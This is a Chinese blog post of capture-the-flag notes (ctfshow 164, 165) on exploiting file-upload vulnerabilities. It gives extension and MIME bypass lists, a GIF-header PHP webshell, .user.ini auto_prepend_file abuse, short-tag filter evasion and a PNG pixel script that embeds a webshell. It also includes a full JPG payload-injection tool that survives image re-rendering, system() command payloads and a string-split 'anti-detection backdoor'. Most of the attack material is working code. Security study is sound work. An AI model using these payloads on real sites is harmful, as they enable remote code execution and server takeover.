首页 > 其他分享 >文件上传

文件上传

时间:2023-11-20 18:13:56浏览次数:46  
标签:文件 substr binData php 上传 dis

文件上传

文件上传漏洞是指攻击者上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务端命令的能力。场景中上传附件、头像等功能,若在系统设计中忽略了相关的安全检查,则容易导致文件上传漏洞。

网站文件常见的后缀名:

asp、asa、cdx、cer、php、aspx、ashx、php3、php.a、shtml、phtml

大写绕过 或 同解析后缀名绕过
同解析名后缀:

PHP:.php .php2 .php3 .php4 .php5 .php6 .php7 .php空格 .phtml .pgif
     .shtml .htaccess .phar .inc 
ASP:.asp .aspx .config .ashx .asmx .aspq .axd .cshtm .cshtml .rem .soap
     .vbhtm .vbhtml .asa .cer .shtml
JSP:.jsp .jspx .jsw .jsv .sjspf .wss .do .action

后门代码需要特定格式后缀解析,不能以图片后缀解析脚本后门代码(解析漏洞除外)

如:jpg图片里面有php后门代码,不能被触发,所以连接不上后门

MIME

Content-Type(内容类型),一般是指网页中存在的 Content-Type,用于定义网络文件的类型和网页的编码,决定浏览器将以什么形式、什么编码读取这个文件,这就是经常看到一些 PHP 网页点击的结果却是下载一个文件或一张图片的原因。

语法格式:

Content-Type: text/html; charset=utf-8
Content-Type: multipart/form-data; boundary=something

常见的媒体格式类型如下:text/html : HTML格式、text/plain :纯文本格式、text/xml : XML格式、image/gif :gif图片格式、image/jpeg :jpg图片格式、image/png:png图片格式

以application开头的媒体格式类型:application/xhtml+xml :XHTML格式、application/xml: XML数据格式、application/atom+xml :Atom XML聚合格式、application/json: JSON数据格式application/pdf:pdf格式、application/msword : Word文档格式、application/octet-stream : 二进制流数据(如常见的文件下载)、application/x-www-form-urlencoded :

中默认的encType,form表单数据被编码为key/value格式发送到服务器(表单默认的提交数据的格式)

x=system('ls');    //获取当前目录下的文件列表
x=system('ls ../');   //上一级
x=system('tac ../flag.php');

文件头绕过

在木马内容基础上再加一些文件信息,比如文件的文件头。

其中.gif文件的文件头可以全部用ascii字符表示:

GIF89a <?php eval($_POST[1]); ?>

.user.ini

.user.ini使用范围很广,nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。

借助.user.ini轻松让所有php文件都“自动”包含某个文件,而这个文件可以是一个正常php文件,也可以是一个包含一句话的webshell。

使用场景:网站后端限制.php 文件上传

auto_prepend_file = <filename>         //包含在文件头
auto_append_file = <filename>          //包含在文件尾

.user.ini需要配置文件index.php


文件内容过滤

过滤常见后门木马,使用正则过滤<?php等

<?=表达式?>          //不需要设置参数环境
<script language="php">echo '1';</script>   //同上

在线IP转数字:在文件上传过滤.时使用

IP/数字互转 iP138在线工具

条件竞争

图片的二次渲染

判定方式:

1、判断上传前和上传后的文件大小。

2、判断上传后的文件返回数据包内容

ctfshow-164

png二次渲染

包含地址:http://52af3f7d-00b8-4f6b-a242-d064c7ced723.challenge.ctf.show/download.php?image=41b586905e6233e72b076191f8bf9512.png

利用脚本生产包含木马的图片,不会被二次渲染删掉

<?php
$p = array(
    0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
    0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
    0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
    0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
    0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
    0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
    0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
    0x66, 0x44, 0x50, 0x33
);

$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
    $r = $p[$y];
    $g = $p[$y + 1];
    $b = $p[$y + 2];
    $color = imagecolorallocate($img, $r, $g, $b);
    imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img, './images.png');
/*木马内容
<? $_GET[0]($_POST[1]); ?>
0=system
1=ls ./
*/

在hackbar没有回显,直接抓包

找到flag

get 0 =system
post 1=tac flag.php

jpg二次渲染

ctfshow-165

1、先上传jpg正常,返回包发现渲染

2、上传ipg渲染后保存,生成带代码图片

脚本代码

<?php
    $miniPayload = '<?=eval($_POST[1]);?>';
 
    if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
        die('php-gd is not installed');
    }
    
    if(!isset($argv[1])) {
        die('php jpg_payload.php <jpg_name.jpg>');
    }
 
    set_error_handler("custom_error_handler");
 
    for($pad = 0; $pad < 1024; $pad++) {
        $nullbytePayloadSize = $pad;
        $dis = new DataInputStream($argv[1]);
        $outStream = file_get_contents($argv[1]);
        $extraBytes = 0;
        $correctImage = TRUE;
 
        if($dis->readShort() != 0xFFD8) {
            die('Incorrect SOI marker');
        }
 
        while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
            $marker = $dis->readByte();
            $size = $dis->readShort() - 2;
            $dis->skip($size);
            if($marker === 0xDA) {
                $startPos = $dis->seek();
                $outStreamTmp = 
                    substr($outStream, 0, $startPos) . 
                    $miniPayload . 
                    str_repeat("\0",$nullbytePayloadSize) . 
                    substr($outStream, $startPos);
                checkImage('_'.$argv[1], $outStreamTmp, TRUE);
                if($extraBytes !== 0) {
                    while((!$dis->eof())) {
                        if($dis->readByte() === 0xFF) {
                            if($dis->readByte !== 0x00) {
                                break;
                            }
                        }
                    }
                    $stopPos = $dis->seek() - 2;
                    $imageStreamSize = $stopPos - $startPos;
                    $outStream = 
                        substr($outStream, 0, $startPos) . 
                        $miniPayload . 
                        substr(
                            str_repeat("\0",$nullbytePayloadSize).
                                substr($outStream, $startPos, $imageStreamSize),
                            0,
                            $nullbytePayloadSize+$imageStreamSize-$extraBytes) . 
                                substr($outStream, $stopPos);
                } elseif($correctImage) {
                    $outStream = $outStreamTmp;
                } else {
                    break;
                }
                if(checkImage('payload_'.$argv[1], $outStream)) {
                    die('Success!');
                } else {
                    break;
                }
            }
        }
    }
    unlink('payload_'.$argv[1]);
    die('Something\'s wrong');
 
    function checkImage($filename, $data, $unlink = FALSE) {
        global $correctImage;
        file_put_contents($filename, $data);
        $correctImage = TRUE;
        imagecreatefromjpeg($filename);
        if($unlink)
            unlink($filename);
        return $correctImage;
    }
 
    function custom_error_handler($errno, $errstr, $errfile, $errline) {
        global $extraBytes, $correctImage;
        $correctImage = FALSE;
        if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
            if(isset($m[1])) {
                $extraBytes = (int)$m[1];
            }
        }
    }
 
    class DataInputStream {
        private $binData;
        private $order;
        private $size;
 
        public function __construct($filename, $order = false, $fromString = false) {
            $this->binData = '';
            $this->order = $order;
            if(!$fromString) {
                if(!file_exists($filename) || !is_file($filename))
                    die('File not exists ['.$filename.']');
                $this->binData = file_get_contents($filename);
            } else {
                $this->binData = $filename;
            }
            $this->size = strlen($this->binData);
        }
 
        public function seek() {
            return ($this->size - strlen($this->binData));
        }
 
        public function skip($skip) {
            $this->binData = substr($this->binData, $skip);
        }
 
        public function readByte() {
            if($this->eof()) {
                die('End Of File');
            }
            $byte = substr($this->binData, 0, 1);
            $this->binData = substr($this->binData, 1);
            return ord($byte);
        }
 
        public function readShort() {
            if(strlen($this->binData) < 2) {
                die('End Of File');
            }
            $short = substr($this->binData, 0, 2);
            $this->binData = substr($this->binData, 2);
            if($this->order) {
                $short = (ord($short[1]) << 8) + ord($short[0]);
            } else {
                $short = (ord($short[0]) << 8) + ord($short[1]);
            }
            return $short;
        }
 
        public function eof() {
            return !$this->binData||(strlen($this->binData) === 0);
        }
    }
?>

指令:进入脚本目录,执行命令

php 脚本.php 要插入的图片.jpg

传值:

1=system('ls');
1=system('tac f*');
1=system('tac flag.php');

免杀后门

<?php $a='syste'$b='m'$c=$a.$b;$c(tac ../flagaa.php');?>

标签:文件,substr,binData,php,上传,dis
From: https://www.cnblogs.com/huangshisan/p/17844513.html

相关文章

  • 清除多个文件内的内容
    echodump-7000.rdbdump-7001.rdbdump-7002.rdbdump-7003.rdbdump-7004.rdbdump-7005.rdb|xargs-I{}sh-c'>{}'TRANSLATEwithxEnglishArabicHebrewPolishBulgarianHindiPortugueseCatalanHmongDawRomanianChinese......
  • Android Studio 下发布项目成APK文件
    AndroidStudio下发布项目成APK文件一、环境和版本Windows10专业版AndroidStudioGiraffe|2022.3.1Patch2这个太重要IDE该版后菜单位置会发生变化二、操作过程操作过程非常简单找到菜单Buid点击弹出后,再找到BuildBundle(s)/APK(s)鼠标滑动后选中BuildAPK(s)点击即可。新......
  • 分布式文件访问方案
    中心机房1.cpeh存储源站文件,利于横向扩展。2.7层负载均衡将分站访问分布在不同的nginx缓存服务器,分担访问。3.nginx使用proxy_cache将ceph的访问文件缓存到服务器的各块ssd硬盘,缓解ceph压力。分站机房1.app根据用户来源ip或者访问内容,将请求分布在不同分站2.分站的负......
  • Windows10 删除库文件夹
    删除打开注册表,找到以下:计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace在左侧NameSpace目录下找到{0DB7E03F-FC29-4DC6-9020-FF41B59E513A}子项删除注:64位系统可能需要额外删除以下目录的同名子项:计算机\HKEY_LOCAL_M......
  • Linux第四章文件权限(2) 2023.11.1
    1、SUID权限(1)普通用户可以通过SUID用户提权chmodu+s/usr/bin/cat(2)在一个目录上添加SGID,该目录新创建的文件会继承其属组chmodg+s/home/hrll-d/home/hrtouch/home/hr/file03ll/home/hr2、Sticky权限添加Sticky后,当用户对目录具有w,x权限在该目录下建立的文件或目......
  • xls和xlsx的文件有什么区别
    原文链接:https://www.php.cn/faq/580108.html导言:在日常使用电脑办公处理文档时,我们经常会遇到两种常见的文件格式,即XLS和XLSX。本文将探讨这两种格式的区别,并分析其演变对文件存储和使用的影响。一、文件格式的定义XLS和XLSX都是MicrosoftExcel电子表格应用程序中的文件格式......
  • 服务器数据恢复—IBM存储OCFS2文件系统下层raid5磁盘损坏导致阵列崩溃,上层虚拟机数据
    服务器数据恢复环境:IBM某型号存储,6块sas硬盘组建一组raid5,划分一个lun分配给Linux服务器并格式化为OCFS2文件系统,共享给虚拟化使用,存放的数据包括24台liunx和windows虚拟机、压缩包文件和配置文件。服务器故障:raid5阵列中成员盘坏了多块,阵列失效,数据丢失。 服务器数据恢复过程......
  • ROS2建立msg文件
    一:创建专门的project书写文件如下图所示,做一个msg文件夹,并建立msg文件,注意首字母一定要大写 创建上面的结构以后需要对package.xcml和CMakeLists.txt文件进行如下的修改package.xcml<build_depend>rosidl_default_generators</build_depend><exec_depend>rosidl_defa......
  • 文件的上传下载测试点
    上传超大超多文件的业务:业务举例:对于rvt文件支持上传200个 (1)上传了200个rvt文件后系统提交成功时间、是否保存成功、页面加载、附件下载的等性能。 (2)上传文件夹后单个删除再上传等边界场景。 (3)上传的进度条展示 (4)上传的过程中取消(刚上传的时候取消,上传到9......
  • 关于视频点播平台EasyDarwin视频直播平台如何上传点播视频的具体操作步骤
    EasyDarwin互联网视频云服务通过其高效的视频管理功能和广泛适用性,为用户提供稳定、流畅的视频服务,广泛应用于各种互联网场景。应用场景包括电视直播、现场直播、时移电视、即刻回看和视频点播功能,适用于OTTTV、IPTV、互联网教育、视频聊天、现场直播和VOD等各种场景应用。E......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99